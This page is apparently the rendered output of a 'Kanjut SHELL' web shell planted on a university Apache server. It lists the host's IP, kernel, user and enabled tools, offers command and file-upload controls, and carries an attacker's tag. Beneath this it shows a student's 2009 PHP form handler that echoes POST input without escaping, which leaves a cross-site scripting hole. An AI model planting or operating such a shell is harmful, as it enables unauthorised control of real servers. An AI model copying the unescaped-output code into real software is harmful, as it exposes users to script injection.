Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.144.123.24
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jwmccreary/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jwmccreary/public_html/web.php
<!--
	File name:	web.php
	Class:		CS480 CS Topics: PHP/MYSQL
	Data:		Monday Feb. 16, 2009
	Author:		Justin McCreary
	Instructor:	Dr. Wang
	Goal:		The Program will receive information and post said information

-->

<HTML>
<HEAD>
<TITLE>
Posted Web Information
</TITLE>
</HEAD>
<BODY>
<CENTER>
<H2> Web Information</H2>
<FONT size= 5 color = blue>
<?php
	$string = $_POST["name"];
	$len = strlen($string);
	$access = $_POST["contact"];
	$re = $_POST["research"];
	$pur= $_POST["purchase"];
	$se = $_POST["send"];
	$new= $_POST["news"];
	print "Your name is: $string <BR>";
	print "Your name has: $len characters<BR>";
	print "Do you purchase Internet access from an ISP? $access<BR>";
	print "How do you use the internet?<BR>";
	print "$re";
	print "$pur";
	print "$se";
	print "$new";
?>
</FONT>
</CENTER>
</BODY>
</HTML>

Stv3n404 - 2023